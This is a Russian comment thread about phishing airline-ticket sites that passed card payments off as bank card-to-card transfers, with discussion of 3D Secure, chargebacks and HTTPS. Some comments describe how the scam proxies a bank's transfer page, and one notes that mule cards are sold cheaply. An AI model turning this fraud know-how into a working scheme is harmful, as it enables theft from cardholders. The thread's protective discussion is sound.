        Каменный век был до внедрения 3D Secure. Тогда для списания денег с карточки нужно было только знать данные этой карточки. Можно сказать, что творились анархия, беспредел, и разгул кардеров. Никто никому не доверял. Карточки предпочитали никому не показывать. Банки могли спокойно отклонить любую транзакцию, как подозрительную. Клиентам было желательно постоянно проверять свои выписки. Сбербанк какое-то время вообще рубал все карточные транзакции из за рубежа. Мне кажется, такая ситуация здорово помогла в популяризации paypal — он предлагал безопасность там, где её не было.
        Сейчас есть 3D secure, подтверждение по СМС, одноразовые коды и даже электронные брелки. Сейчас бронзовый век:)
      • 0
        для подтверждения платежей не требуется принимать СМС или иметь мобильный телефон под рукой вообще — есть приложение E-Num, которое генерирует одноразовые коды, принимая на вход кошелек, которому переводятся средства, сумму, challenge-код. <...> И приложение есть под все платформы, даже под Symbian и Java оно до сих пор работоспособное, не говоря уже о Blackberry и Bada.

        Вы это приложение, наверное, на микроволновке запускаете? Раз оно у вас работает даже тогда, когда мобильного телефона нет под рукой вообще?
        • +2
          На компьютере, с которого оплачиваю, внезапно.
          • +2
            После перечня мобильных платформ — действительно внезапно.
      • +4
        Вообще, безопасности оплаты картами в интернете застряла где-то в каменном веке.

        ИМХО, это проблема слишком многогранна, и дело тут не всегда в отсутствии прогресса.

        Боюсь, что озвучу чрезвычайно крамольную вещь, но на самом деле никому эта безопасность нафиг не упала, особенно клиентам (по крайней мере, их 99% из тех, кто не сидит регулярно на Хабре, банках.ру и прочих тематических сайтах).

        Что нужно клиенту? Клиенту нужно, чтобы всё сработало здесь и сейчас, причём как можно более простым способом. Начнёшь вводить назойливые проверки, блокировки операций по геолокации, вторые-третьи факторы и прочие разумные с точки зрения безопасности фишки — налетишь на аааагроменное недовольство клиентов, плохие отзывы («совершенно несправедливые!» с точки зрения безопасников) и отток клиентов.

        Банку тоже чрезмерные замуты с безопасностью не нужны — люди привыкли к концепции «всё в 1 клик» (точнее, их к этому долго и активно приучали), поэтому любые многоэтажные конструкции проверки им нафиг не сдались. Будет слишком сложная «безопасность» — будет все больше людей, которые будут оказываться от услуг банка / мерчанта в пользу «более сговорчивых» коллег, а то и попросту возвращаться в кэш / WM / другие способы платежей.

        Платежная система? Щаззз, этим наоборот надо, чтобы всё было проще, клиенты были довольны, а обороты росли. Поэтому в правилах той же Visa в Штатах написано, что мерчант НЕ ВПРАВЕ отказать клиенту в проведении операции по карте, если клиент отказывается предъявить документ, удостоверяющий личность :-) Почему? Опять же, не хотят негативной волны, которая может ударить по их бизнесу много сильнее, чем редкие мошенничества.

        Единственный, кто более-менее должен быть заинтересован в безопасности — это мерчант, то бишь торговая точка, но и он понимает, что введение слишком сложных мер приведет к тому, что клиенты уйдут к конкурентам. Поверьте, никто (даже я, несмотря на понимание того, почему это делается) не оценит отмены заказа через 2 дня после его размещения с причиной "слишком высокий фрод-скор", а оставит злобнейший отзыв на Yelp'e и закажет то же самое в другом магазине.

        Вот и получается такой вечный поиск тонкого баланса…
        • 0
          никто не оценит отмены заказа через 2 дня после его размещения с причиной «слишком высокий фрод-скор»

          При этом они постоянно так делают при трансграничных заказах. Пожалуй половина американских магазинов при оплате русской картой или с русского IP морозят заказы (вплоть до месяца), отменяют их и всячески трахают мозги. Особенно когда твой заказ с черной пятницы отменили «весело» становится. А пойти и купить в другом не получится, ибо накрутки и все такое.
          • +2
            Поверьте, не только при трансграничных :-(

            Я, например, больше никогда и ни за какие коврижки не буду связываться с Travelocity после того, как они мне в 3 часа утра отменили билет с вылетом на следующий день, а индусы на линии поддержки *категорически* отказались вообще что-то объяснять и комментировать — плюнул, купил тот же самый билет в Expedia и спокойно улетел…

            А как насчет магазина, который повесил холд на 5 дней, а потом просто тупо отменил заказ без звонка или даже e-mail'a, а потом по телефону объяснил, что, дескать, по геолокации я в момент оформления находился слишком далеко от адреса доставки, поэтому их система решила, что, возможно, это мошенничество.
            И в том, и в другом случае это были «нормальные» кредитки, выпущенные американскими банками, с американскими же billing-адресами.

            Думаю, лишним будет говорить, что более в этих точках никогда не отоваривался.

            Т.е. проблема налицо — вроде бы точки хотели сделать как лучше, типа как обезопасить себя и деньги клиента, но вот реализация сего хорошего намерения привела к тому, что клиент теперь потерян и, скорее всего, навсегда…
      • 0
        У веб мани есть фундаментальная проблема — он толком не работает на Linux и в Chrome
        • 0
          Вы про Light? Не знаю, пользуюсь Mini.
          • 0
            Да, я про лайт и в частности авторизацию по сертификатам. Забавно то что до какого-то времени она отлично работала и я пользовался wm keeper lite регулярно. А когда этот функционал поломали — возможности пользоваться webmoney я лишился, т.к. остальные варианты мне не удобны.
            • 0
              А что там конкретно случилось? Как сломали аутентификацию? Она же всеми браузерами одинаково поддерживается.
              • 0
                В хром сертификат не ставится от слова совсем. В файрфокс выше какой-то версии ставится, но не авторизует по нему.
      • 0
        Большинство сервисов не проверяют введенное имя

        А как они могут проверить введённое имя?
    • 0
      Для того, что бы 3D secure сработал, надо что бы он поддерживался как банком, так и мерчантом. Если мерчант не поддерживает 3D secure, то платеж пройдет и так. Видимо у Директа поддержки 3D secure нету.
    • 0
      Amazon например даже CVV не спрашивает. Технически списывать без подтверждений возможно имея не более, чем номер карты и срок действия. Остальное — просто дополнительные уровни защиты.
    • 0
      В некоторые сервисы дает заплатить без 3DS. В данном случае это Яндекс Директ. Рекуррентные платежи или платежи по шаблону в Сбербанке тут не причем.
  • +10
    прочел на одном дыхании.
  • –22
    Вот это детектив! Похоже, что мошенники пользуются каким-то неизвестным эксплоитом
    • –5
      Все-все, я прочитал комментарии и примерно понял механизм мошенничества :)
  • +1
    Я ни разу не сталкивался с ситуацией, чтобы Сбербанк в интернете позволял что-то оплатить без проверки 3D Secure (без подтверждения через SMS)

    3D Secure должен поддерживаться двумя сторонами, как банком выпустившим карту, так и тем банком чей платёжный шлюз используется для приёма платежа.
    Только вчера платил за коммуналку (если точнее — электричество на сайте мосэнергосбыт) с карты сбера без ввода кода 3D Secure. Платёжный шлюз от Альфа-Банка
    • +1
      И в магазинах разных, даже в одной сети. В одном спрашивает код, в другом нет.
      • +6
        Да, 3D Secure это просто опциональный перенос ответственности на клиента. Если магазин хочет, то может сам нести риски.

        В обычных (не защищённых 3-D Secure) транзакциях ответственность за операции по украденным картам несёт «мерчант» — торгово-сервисное предприятие, на сайте которого была произведена покупка товара/услуги по ворованной карте, при условии, что он не поддерживает эту технологию.

        В случае использования 3-D Secure происходит так называемый «Перенос ответственности» (Liability Shift), когда ответственность переносится на банк-эмитент, выпустивший карту или на самого клиента.
      • 0
        Да, верно. Ещё и от настроек мерчанта зависит
  • +2
    Можно вопрос вот по этому утверждению:

    1. Домен в зоне EU должен был по крайней мере насторожить.

    Что-то не так с EU, или подозрительно, что не RU?
    • +1
      ну обычно уважающие себя российские коммерческие сайты имеют зану RU и https
      так просто принято в узких коммерческих кругах
      • +5
        Скоро, благодаря letsencrypt, с хттпс проблем ни у кого не будет. :)
        • +3
          Нужно смотреть не на https, а на тип сертификата. У LetsEncrypt DV-сертификат, который означает лишь то, что соединение защищено и никто не «подсматривает».

          У серьёзных организаций EV-сертификат, при выдаче которого удостоверяющий центр проводит, как минимум, проверку, существует ли организация в реальности.
          • +7
            Это мы с вами знаем. А обычный пользователь, который только-только приучился смотреть на замочек рядом с урлом?

            EV-сертификат — не панацея. Я однажды получал его на компанию, зарегистрированную неделей ранее в юрисдикции BVI.

            В качестве подтверждения существования компании CA попросил предоставить счёт за телефонные переговоры за пару прошлых месяцев и счёт за услуги клининга. Эти документы оффшорный регистратор даёт нахаляву.

            Этапы «убедиться, что компания зарегистрирована по адресу массовой регистрации» и «посмотреть на гугле адрес по которому предоставлялись услуги клининга и убедиться, что там во всём здании нет стольки квадратных метров, за сколько выставлен счёт», CA опускает.
            • +1
              > А обычный пользователь, который только-только приучился смотреть на замочек рядом с урлом?
              Такими темпами браузеры перестанут помечать замочком (или сделают его серым) для сайтов с простым сертификатом. Если уже не сделали.
              • +3
                давно, простые сертификаты помечны просто замочком, а сертификаты с расширенной проверкой будут помечены названием организации зеленым цветом рядом.
                • 0
                  Странно, что я ни разу не слышал/не читал рекомендацию типа «никогда не вводите данные карты на не подписанных сайтах». Кучу всякой херни пишут в этих своих брошурках «how to stay safe online», а вот такого простого и очевидного совета не видел ни разу, хотя карт этих сменил штук 10 за последние 5 лет
        • +1
          Судя по скриншотам FF, соединение http (расчёт делается на то, что 90% пользователей шапку не смотрят). Не мешало бы настройку включить: user_pref(«browser.urlbar.trimURLs», false);

          xbox, на 75% YМ принадлежат СБ.
          • 0
            Первый сайт _aviapromo.eu_ использовал HTTPS и на заглавной странице (видно на одном из самых верхних скриншотов, сделанном на телефон) и на странице оплаты. HTML код страницы оплаты у него значительно отличался от _avia-scanners.ru_. Там я вообще не нашел никаких ссылок на банки. Подозрительные моменты там были, но так очевидно, как с Тиньковым там не получилось разобраться. Вот такой, например, подозрительный код там был в HTML,
            <a href="view-source:https://aviapromo.eu/merch/payp2p.php" class="attribute-value">payp2p.php</a>
            
            С первым сайтом я сильно не успел поэксперементировать, поскольку хостинг-провайдер его по заявлению отключил. Но у меня остался HTML код страницы оплаты. Также как остался HTML код страницы оплаты со второго сайта. Я бы мог их выложить, но не знаю, нужно ли и куда выкладывать. Сохранял код через браузер. Скрипты при этом не сохранились. Поэтому по HTML коду полностью картину не восстановишь. Можно строить только предположения.

            Второй сайт _avia-scanners.ru_ использовал http. В этот раз я уже более наглядно делал скриншоты. На картинках видно.
  • +5
    Я покупаю билеты так: ищу билеты по расписаниям, смотрю какие авиакомпании выполняют подходящие мне рейсы, покупаю билеты на сайте авиакомпании.
    • +2
      Аналогично. Это ещё надёжнее в том плане, что заключается договор непосредственно с авиакомпанией, а не третьей стороной, когда концов не докопаешься.
      • +3
        Нередко на сайтах перекупщиков цены бывают ниже, чем на сайте самой авиакомпании. Приходится выбирать между риском и дороговизной.
        • 0
          Ещё большой вопрос продадут ли реально по такой цене или «ой, извините, забыли сайт обновить»?
          • +1
            Мне так S7 не продавала дешёвый билет. При поиске есть, а как заказывать начинаешь — в четыре раза дороже. Ищем через некоторое время опять — есть, начинаем заказывать — нет. При этом все агрегаторы показывали только дорогие билеты. Так что вопрос большой и разносторонний.
            • +1
              Мне авиаяндекс показывает дешёвые билеты, лучшее предложение на мой маршрут. Переходишь на сайт S7 — дешёвый выбран, но не заказывается. Если радиобаттон с дешёвого варианта убрать, то вернуть потом нельзя — вариант из списка исчезает. Думал, повезло на баг, как обычно. Но если не только у меня, то, видимо, планомерно этим промышляют.
              А самый дешёвый из настоящих доступных вариантов S7 примерно на 5% дороже самого дешёвого у перекупов.
        • +2
          Вам не доводилось слышать про OZON travel? Когда покупаешь билет, а через несколько дней оказывается, что нет у тебя никакого билета, потому что продавец не смог выкупить его по обещанной цене.
    • +10
      Пройдемся по шагам.

      > 1. Домен в зоне EU должен был по крайней мере насторожить.

      Упс. Чем?
      По этой логике должны настораживать aviasales.su, rossiya-airlines.com, pobeda.aero, vim-avia.com… да?

      > 2. Кроме поиска авиабилетов на сайте было всего несколько страниц, цель которых пустить пыль в глаза.

      Все сайты, на которых можно что-то купить, устроены именно так. Пыль может быть разного калибра и в разном количестве, но суть одна и та же.

      > 3. Если копнуть глубже, то указанный на странице ОГРН компании принадлежал компании, которая была закрыта в 2011 году.

      Здесь и далее — просто без комментариев. Да, это все информация открыта, но никто не мешает мошенникам указать настоящую информацию любой фирмы.

      4. Рейтинги сайта ТиЦ и PR нулевые

      Это к сожалению, ни о чем не говорит. СЕОшники могут меряться этими циферками, а для обычных людей это птичий язык.

      5. Основное, что должно было насторожить. Должна была быть оплата без комиссии, как указано на сайте, 5900 за каждый авиабилет, а в смс от банка пришло назначение «Списание 5900.00 P2P PSBANK»

      А начиная с этого момента — уже поздно. Данные карты введены, вуаля.

      Итого — обычный человек в подобном случае ничего сделать не может к сожалению.

      Остается незакрытым вопрос успешной оплаты без MCSC/VbV — как любит напоминать Сбербанк, это «невозможно»…
      • 0
        Справедливости ради.
        А начиная с этого момента — уже поздно. Данные карты введены, вуаля.

        Не совсем так. Насколько я знаю — если вы не ввели код из смс от банка — то операцию опротестовать более чем реально. Если же ввели код из смс — то реально только если деньги с той стороны куда перевели получится «заморозить» (т.е. если они там ещё есть).
        • 0
          Сорри, но это уже выяснили — если магазин не поддерживает MCSC/VbV, то никаких смс не будет.
          А зачем мошенникам ставить препятствия самим себе?
          • 0
            Насколько я знаю, если магазин не поддерживает MCSC/VbV то он берёт на себя риски того, что операция будет опротестована.
            • +2
              Увы, в данном случае это не сработает потому что на мошенническом сайте вы ничего не покупаете в магазине, а совершаете частный перевод на карту подставного физлица.
              • 0
                Не слышал о переводах на частную карту без смс — но всё равно — на сколько я знаю, правила мастеркарда и визы довольно просты: если нет введения смс — то при опротестовывании операции — все деньги вернут владельцу (видимо за счёт банка — если он допускает операции перевода денег на карту без смс).
      • +2
        С доменом .aero все, как-раз, нормально — он выдается только организациям связанным с авиаперевозками и для того, что б его получить — нужны соответствующие документы.
    • +1
      Неочевидный факт — иногда покупка билета у посредника обходится дешевле, чем напрямую. Но риски повышаются, да.
      • 0
        Не доверяю всем этим посредникам. А если отзывы почитать про всякие синбады и купибилеты, то пропадает желание даже смотреть в сторону посредников.
        • +4
          За это и платите больше, да.
          • +1
            Ну это только до первого мошенничества.
    • +1
      но ведь так получается дороже?
      • 0
        Не-а, обычно сайты посредники берут свою пару сотен рублей.
        • +3
          По-разному. Я видел у посредников цены и на $50 дороже, и на $50 дешевле, чем на такой же рейс на оффсайте авиакомпании.
        • 0
          Вы ещё скажите что покупка билета туда-обратно всегда дешевле.
          • 0
            Давно уже таких не видел. Несколько лет назад бывали такие. Кажется, была акция Аэрофлота пару лет назад, но не помню туда-обратно или просто дешёвые билеты. Обычно такие акции были на выходные с захватом ночи с субботы на воскресенье.

            Возможно, перестали по каким-то соображениям или от того что просекли фишку, что можно брать «парные» билеты. Типа обратно на следующей неделе, а потом в обратном направлении на выходные.
            • +1
              Seattle-Vienna. Round trip с 1 пересадкой от $1300. One way с одной пересадкой от $2400(!).
          • 0
            Я только этим летом билеты на Пхукет покупал. Себе туда-обратно, другу, который уже там был и попросил купить ему обратный билет на тот же рейс купил почти за 80% стоимости своего (который в обе стороны). Аэрофлот. (билеты абсолютно одного класса).
            • 0
              Ну, а я себе покупал билеты СПб-Нск. Покупал два отдельных билета. Не фиг-то и экономия, но 200 рублей разницы по сравнению с туда-обратно на те же рейсы.
    • 0
      Не всегда лучше и почти всегда дороже агрегаторов.
  • +1
    Вопрос — на той странице, где надо было вводить данные карты для оплаты, был ли https? Ничего подозрительного в его сертификате не было?
    • +4
      Судя по отсутствию иконки замка у в адресной строке, там голый http.
      • 0
        Да уж. Это должно было насторожить сразу. А то получается что тогда кроме этих мошенников данные карты могли уплыть любому, прослушивающему данный траффик.
        • +7
          Вас беспокоит, что данные могли достаться другим мошенникам, перехватывающим трафик?
          • +7
            Ну в каком-то смысле, меня беспокоят не-https страницы, где я должен вводить свою платёжную информацию
          • +2
            Это был бы довольно интригующий поворот, как раз в духе статьи (согласитесь, написано увлекательно). Но не, как и товарища ниже, меня в основном смущает необходимость вводить какие-либо личные (не говоря уж о платёжных) данные на сайте без https.
        • –3
          форма может отправлять данные на урл с https а сам сайт крутится на http. Зачем? Может для снижения нагрузки на процессор, вероятно. Видел пару раз на госсайтах.
          • +2
            Нет, не может, это проблема курицы и яйца. Введите в гугл и получите миллион ссылок, почему так делать нельзя. Вот первая.
      • 0
        У vim-avia весной тоже не было замка. Я тогда на это посмотрел и передумал у них покупать.
    • 0
      Выше в комментариях написал только что.
      На первом сайте был https.
      На втором сайте был http.
      Сертификат я не проверял, но каких либо сообщений браузера или антивируса, как это иногда бывает, не выдавалось.
  • 0
    >>Я ни разу не сталкивался с ситуацией, чтобы Сбербанк в интернете позволял что-то оплатить без проверки 3D Secure (без подтверждения через SMS).

    А я сталкивался, например в Steam (и не только там).

    На соответствующий вопрос сбер мне ответил что-то в духе «На усмотрение магазина».
    Собственно ответ:

    Ответ Клиенту:
    Уважаемый <ФИО>
    ОАО «Сбербанк России», рассмотрев Ваше обращение, сообщает следующее.
    Согласно Условиям использования банковских карт ОАО «Сбербанк России»:
    п. 11.7. — Держатель соглашается с получением услуг через сеть Интернет,
    осознавая, что сеть Интернет не является безопасным каналом связи, и
    соглашается нести все риски, связанные с возможным нарушением
    конфиденциальности и целостности информации при её передаче через сеть
    Интернет
    Дополнительно сообщаем, что способ подтверждения операции в сети интернет
    определяется непосредственно разработчиком сайта.
    Обращаем Ваше внимание на то, что с Условиями использования банковских карт
    ОАО
    «Сбербанк России» Вы можете ознакомиться в подразделениях Банка либо на
    сайте
    Сбербанка России по адресу (http://www.sbrf.ru/moscow/).
    Благодарим Вас за Ваше обращение и надеемся, что наши разъяснения помогли
    Вам
    разобраться в сложившейся ситуации.

    Вопрос Клиента:
    При покупке к некоторых онлайн-магазинах не требуется подтверждение в виде
    одноразового СМС-пароля (оплата проходит без запроса такового).
    • +1
      Любая технология защиты должна поддерживаться обеими сторонами платежа. Если одна из сторон поддерживает какую-либо технологию защиты, а другая нет, то в случае диспута (спора, кто мошенник, и кто должен вернуть деньги) платежная система встает на более «защищенную» сторону.
      Такой подход стимулирует участников подключать как можно больше разных степеней защиты (чип на карте, вместо магнитной ленты, временные коды, 3D-secure и прочее). Поэтому если ваш банк поддерживает 3D-Secure (а судя по написанному, так и есть), а получатель платежа не поддерживает (иначе деньги не ушли бы), то на основе вашего заявления в банк начинается диспут между вашим банком и банком получателем. Платежная система присуждает вашему банку пальму победы, как более «защищенному» банку. Банк-получатель_платежа вынужден вернуть эти деньги. И получается, что потерпевшим от действий мошенников становится именно он. Это стимулирует его тщательнее проверять своих клиентов и писать на них заявления в милицию в случае необходимости.
      Другое дело, что карты эти могут быть ворованными. Но это уже другая история.
  • 0
    Для тех, кого интересует оплата без смс подтверждения — тот же алиэкспресс проводит транзакции без 3D-Secure подтверждения
  • +4
    Никогда не понимал тех, кто на первом найденном «поисковике билетов» что-то заказывает… Есть пара проверенных и весьма известных искалок, и есть прямые сайты авиакомпаний… Надеяться, что сторонний сайт магическим образом даст лучшую цену? Ну-ну… Кстати, не отсюда ли ноги растут у мифов о том, что на сайтах авиакомпаний цена динамически меняется, например, после долгого поиска? :)
    • +3

      Ничего себе миф. Вчера покупал билеты на delta.com. И что бы вы думали? Первая попытка закончилась "какая-то проблема при покупке, попробуйте ещё раз" — с начала поиска. Вторая — "кажется, этот рейс пользуется спросом, платите на $50 больше или попробуйте ещё раз". Стоимость билетов сначала — $208, то есть подняли на 25% внаглую. Билеты были нужны, чувствую себя последним лохом, но купить пришлось.

      • +1
        Есть и другие сайты — не только этот. Зачем продолжать пользоваться тем кто использует полумошеннические схемы?
        • 0

          Так получилось, что я рассчитывал именно на эти билеты и особого выбора больше не было.

  • 0
    У вас на скрине, где вводятся данные карты, указан протокол http. Хотя бы одно это должно было насторожить от всяческих дальнейших действий.
    И конечно же, сервисы перевода денег с карты на карту должны заняться проблемой, описанной у вас. Знаю, что представители того же ТКСБ есть на Хабре и ГТ.
    • 0
      Да это тоже должно настораживать при оплате в интернете.
      Но я думаю, что если провести опрос авиапасажиров, у всех, кто покупал билеты через интернет, то процент тех, кто знает, чем отличается http от https, будет сопоставим с процентом проголосовавших на прошедших выборах за непарламентские партии.
      Я думаю, что если среднестатистический человек не хочет рисковать, то он покупает билеты на нескольких самых известных сайтах. К примеру, если билет покупается на рейс аэрофолота, то и искать его логично на сайте аэрофлота. А уж если человек находится на сайте аэрофлота, то смотрит ли он на значок http/https в адресной строке, — это вопрос.
  • 0
    А заявление об инциденте в ТКС Банк было отправлено?
    • 0
      Я хоть и не являюсь участником инцидента, но отправил им заявку с предложением фильтровать http-referrer на странице cardtocard с ссылкой на эту публикацию
      • +2
        Это бессмысленно в случае такого мошенничества, которое описано в статье. Данные все равно проксируются, иначе злоумышленники бы не узнали номер карты.
    • 0
      Да, в ТКС я сообщил об этом фишинговом сайте.
      По телефону у меня всю информацию под диктовку приняли и оформили в своей системе.
      Из контактных данных взяли только адрес почты.
      Номер обращения или что-то подобное не сообщали.
      С Тиньковым собственно у моего знакомого не было инцидента). Инцидент был с другим банком. А Банк Тинькова уже позже на втором сайте засветился. Поэтому я их предупредил о мошенническом сайте, а формального повода что-то от них просить у меня нет.
  • +6
    1. Заявление в банк о мошенническом платеже надо писать не позже, чем в течении суток с момента списания. В этом случае банк должен вернуть вам деньги.
    2. Не все сайты спрашивают 3D-Secure. Более того, для списания денег не надо знать ни CVV (CVC), на фамилию-имя. И это никакой не эксплойт, это принцип работы платежной системы.
    3. При переводе денег следует проверять, что страница работает через HTTPS.
    4. Платежные системы отслеживают количество мошеннических платежей в отчетный период (и общую сумму таких платежей). Как только у банка сумма мошеннических платежей превышает определенный порог, банк попадает на обалдеть какой крупный штраф. После этого, я вас уверяю, собственная служба безопасности банка сама найдет и «накажет» владельца этих сайтов. Так что пишите заявления о мошенническом платеже «чардж бэк» в банк по каждому факту списания. Пишите их сразу, как обнаружите. Не на следующий день, не в выходные, не после отпуска, а сразу (если конечно хотите вернуть свои деньги).
    5. И на последок: да, для оплаты в интернете лучше держать отдельную карту, деньги на которую переводить непосредственно перед покупкой. Сейчас многие банки предлагают выпустить виртуальную карту, дополнительную к основной или что-то похожее.
    • +3
      1. Не списания, а уведомления Вас банком о транзакции.
      Если Банк лопухнулся и договоренным способом предупредил вас не своевременно, а только через год — то у вас есть сутки с момента оповещения.

      Минус — банки эту дыру знают, и в стандартный договор прописывают, что клиент обязан ежесуточно запрашивать выписку через интернет-банк и все такое.
    • –13
      Да вы охуеть какой эксперт :)))
      По пунктам даже лень идти.

      Владелец мерчант аккаунта.
      • +4
        И всё-таки сделайте усилие над собой — если есть что сказать.
        • +1
          Ну окей.
          1) Это полная чушь.
          2) Это зависит от мерчанта. Например американские мерчанты в зависимости от настроек, могут взбрыкнуть на неправильный зип код или даже адрес (да, адрес тоже в авторизации учавствует).
          3) По барабану.
          4) На штрафы попадает не банк, а мерчант аккаунт. В его же интересах и противодействовать фроду. С меня, например за любой чаржбек лупили сверху $40, что никак не подпадает под «обалдеть какой крупный штраф», как сказал автор выше.
          Заявлять о чаржбеках, вовсе не обязательно в тот же день итп. Там срок чуть ли не полгода.
          5) Ну может быть и лучше, но я предпочитаю устанавливать лимит по текущей карте и не ломать голову. Перед большим снятием или покупкой прямо с телефона увеличиваю лимит и все окей.
          • 0
            Насколько я понимаю ситуацию — когда деньги уходят продавцу — там да — есть куча времени для того чтобы опротестовать операцию. Но если перевод был с карты на карту — я бы рекомендовал поторопится ибо вернуть деньги будет можно если они ещё есть на карте мошенника.

            Ну и насчёт https — я бы рекомендовал бы всё же обращать на это внимание — иначе перехватят данные карты и оплатят яндекс-директ мошеннику. Деньги то вы в итоги вернёте — но зачем решать проблемы если можно их просто не создавать.
  • 0
    Вопрос к форме платежа у банка — как получается, что банк/ПС форму принимает без кукисов и с черти-каким рефером? Это же прекрасная лазейка для мошенников…
    • +3
      Скрипт на сайте сам лезет на страничку cardtocard, скачивает оттуда страничку оплаты, чуть рихтует, ставит свои адреса и показывает клиенту. После этого обрабатывает ввод клиента и сам генерирует новый запрос в cardtocard. Для cardtocard сервиса все выглядит так, что клиентом является виртуалка на FirstVDS. Клиент-жертва никак не засвечивается.
      Это как посылать взрослого дядьку в магазин за сигаретами/пивом, когда вам ещё по возрасту не дают. Если дядька сам не скажет, продавец никогда не узнает, что заказчиком были вы.
      Посредничество — это логическая дыра, которую не закрыть никак, кроме как СМС и одноразовыми паролями.
  • –1
    Какие бурные обсуждения тонкой рекламы безопасного браузера яндыкса, аж слеза выступает.
    • 0
      насчет браузера яндекса не знаю, а вот строка одного от одного антивируса в скриншоте имеется. сайт avia-scanners.ru сейчас открывается спокойно
      • 0
        а aviapromo.eu?
        • 0
          не открывается
      • 0
        _avia-scanners.ru_ заблокировал хостинг провейдер firstVDS по моему заявлению. Ночью я им написал. В середине дня «Отдел по борьбе с нелегальной активностью пользователей FirstVDS» отключил соответствующий аккаунт на хостинге. Еще в FirstVDS писал про _aviasalle.com_. Но его не заблокировали. А сам сайт оперативно отключил функционал для мошеннических действий.

        Про _avia-scanners.ru_ я заявления провайдеру не писал (хостинг другой). Этот сайт оставил для того, чтобы читатели публикации смогли его препарировать и разобрать. Сейчас этот сайт уже не работает.
  • +1
    в «последнем» сайте в разделе контакты, домен сайта, не совпадает с «mailto» http://aviasalle.com/%22mailto:krukov@pilotavia.com/%22
  • 0
    > Сбербанк в интернете позволял что-то оплатить без проверки 3D Secure (без подтверждения через SMS)

    Есть протокол токенизированных платежей. Сначала при первой оплате создается токен (с 3ds-запросом и кодом из смс), далее все последующие оплаты делаются через токен. При последующих списаниях окно 3ds-а не показывается.
  • 0
    Всем привет! Появился вопрос — а сайты-генераторы (вроде скайсканера) могут показывать сайты мошенников? Или все же они их не захватывают
    • +1
      В выдачу метапоисковиков (вроде скайсканера) попадают только партнеры этих метапоисковиков.
      • 0
        Только партнеры, да, по крайней мере раньше так было.

        Имел отношение к прошлой версии сайта.
        • 0
          Позвольте, причем здесь «раньше так было»? Оно по-другому быть вообще в принципе не может, поскольку метапоисковик отдал некоему сайту из своей выдачи клиента и должен получить в обратку свою комиссию с этой продажи. Тут бизнес, а не благотворительность.
  • 0
    Если оставить в стороне чисто технические вопросы реализации, в сухом остатке остаётся главный вывод — паранойя в денежных вопросах никогда не повредит. Нужно принять за аксиому потенциальную небезопасность любых денежных операций. Особенно через интернет. Независимо от уверений банков, что это абсолютно безопасно. Учитывая потенциальный риск, этот риск необходимо ограничить. Для оплаты через интернет использовать карту, на которой нет суммы больше, чем необходимо для оплаты суммы заказа в данный конкретный момент. В идеале вообще лучше иметь отдельную карту для таких операций, потому как если вы думаете, что за вами не следят, далеко не факт, что это так.
    • +1
      Да это поможет, но только частично.

      Если Вам нужно оплатить за билеты 5900р+5900р, то ровно столько Вы положите на карту и столько оплатите. А, в случаях с мошенническими действиями, куда пошла оплата, сразу можно даже не понять. Потерпевший, к примеру, в первом заявлении в Сбербанк указал, что у него украли 17700р+17700р и пытались еще украсть 10800р. При этом человек был уверен, что хоть билеты у него в кармане. Когда выяснилось, что и билетов нет, пришлось писать идти в Сбербанк и писать еще одно заявление.
  • 0
    Приходите в банк и пишете заявление. Это называется чарджбэк. Если транзакция была проведена без 3дсекур, то вроде как все уважаемые банки перекладывают ответственность в этом случае на мерчанта (т.е. мерчант должен доказать факт предоставления услуги) иначе деньги возвращаются клиенту.

    P.S. Где же спецы с payonline (которы заспамили рекламными постами тут) когда они так нужны.
    • +1
      В статье речь идёт про перевод с карты на карту, который замаскирован под оплату в магазине. Вопрос на засыпку. Относятся ли правила относительно мерчантов и 3d secure к переводу с карты на карту?
      • +1
        Скоре всего да, так как вы «You didn't receive an item ordered». Я думаю это дело можно выиграть. Вы НЕ ДОБРОВОЛЬНО делали п2п платеж
      • 0
        Первый платеж с карты на карту и он подтвержден через 3dsecure. Остальные уже скорее всего обычные покупки
    • 0
      Не поможет, особенно со Сбербанком. Где можно оплатить без 3d secure? Да на одноклассниках.ру! Платежный сервис там от mail.ru. Кроме того карта запоминается сразу же! и может кроме всего прочего участвовать как в регулярных платежах так и в последующем без какого либо ввода карты, привязанной к аккаунту ОК. Так вот. У жены взломали акк ОК, и увели деньги, благо не много. майл.ру послал лесом, ОК сказали читайте соглашение, послали туда же, Сбербанк слушать особо не стал, через угрозы что зарегить заявление они обязаны в любом случае, даже если не могут выполнить — зарегили, но отправили в полицию. Итог — денег не вернул никто и возвращать никто не собирается. Так что наивно верить в банк что он там если нет 3дсекур — банк обязан… никому он ничего не обязан!
  • +6
    Ввиду данной проблемы давно завел себе «помойную» карту, и перевожу на неё требуемую сумму перед оплатой.
    А насчет 3D бесит еще другая «мулька», это когда ты первый раз оплатил подписку чего-то, а через время с тебя автоматом сдергивают продление, причем у некоторых сервисов нет толком кнопки Отписаться, надо её где-то искать очень глубоко в меню или через поддержку, но денежка уже ушла и вы увидели СМСку.
    Опсосы тоже этим пользуются, хотя у них хоть пишут «Автоплатеж», хотя многие не смотрят остаток. У меня была абонентка 300 руб, а на счете уже 350 лежало, но нефига, пришло сообщение что с карты переведено 300 руб и на счете уже 650… отрубил потом, лучше сам в ручную переведу.
  • +1
    >>После всей этой истории было написано заявление в полицию (на рассмотрении), в сбербанк (на рассмотрении), в Яндекс, хостинг-провайдеру и др.

    А банк получателя средств ставили в известность? В выписке наверное и частично реквизиты карты получателя указаны.
    • 0
      Так там банк получателя — НКО Яндекс Денег. Такие карты оформленные на всяких алкоголиков и не очень умных граждан жаждущих работы продаются по пару тысяч рублей за штуку. Впрочем, продают все, даже ТКС, просто он дороже, а из дешевых Яндекс Деньги и Сбер.
      • 0
        у ЯД вроде же там лимиты по средствам, и при таких суммах мошенечества = идентификация, т.е. реальный владелец должен быть известен.
        • 0
          Реальный владелец ≠ мошенник. Вот, что бы понятнее было.
      • 0
        понял, спасибо

    • 0
      >А банк получателя средств ставили в известность? В выписке наверное и частично реквизиты карты получателя указаны.

      В Яндекс я писал разные письма. Но письма про то, что получатель украденных средств выводил их на карты, выпущенные банком Яндекса, я не писал. На момент переписки я Яндексом у меня не было такой информации. Её я обнаружил позже. Сейчас уже не знаю, нужно ли в Яндекс писать, или они уже прочитали статью и в курсе.

